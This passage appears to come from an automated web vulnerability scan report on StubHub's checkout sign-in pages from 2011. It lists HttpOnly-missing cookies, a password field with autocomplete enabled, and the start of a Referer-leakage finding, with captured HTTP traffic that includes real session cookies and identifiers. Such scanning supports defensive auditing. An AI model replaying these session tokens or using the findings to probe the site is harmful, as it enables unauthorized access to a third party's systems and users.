Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.a=1297856549180; TLTHID=CF183E4839C11039789E94000C1CF856; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:19 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:19 GMT
Cache-Control: max-age=1800
Set-Cookie: TLTHID=CF55A4E039C110395C85A19FC1E4C140; Path=/; Domain=.stubhub.com


4.21. https://buy.stubhub.com/promotions/scratch/test/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/test/mbox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/test/mbox.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 28 Oct 2010 22:25:16 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1599
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE393D239C11039317A904AB7E84BF7; Path=/; Domain=.stubhub.com


4.22. https://buy.stubhub.com/promotions/scratch/test/s_code_2011_01_27.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/test/s_code_2011_01_27.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/test/s_code_2011_01_27.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 27 Jan 2011 22:30:08 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF10E41839C11039A5D4871236610E4F; Path=/; Domain=.stubhub.com


4.23. https://buy.stubhub.com/resources/css/stubhub.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /resources/css/stubhub.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/css/stubhub.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Mon, 05 Feb 2007 20:17:13 GMT
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF13009039C1103967B8D80BA34965BB; Path=/; Domain=.stubhub.com


5. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<div class="p-inside-wrapper"><form action="/checkout/checkoutsignin.signin.signinform" id="signinForm" method="post" name="signinForm"><div class="t-invisible">
...[SNIP]...
</label><input id="loginPassword" name="loginPassword" type="password" value=""/><br/>
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation
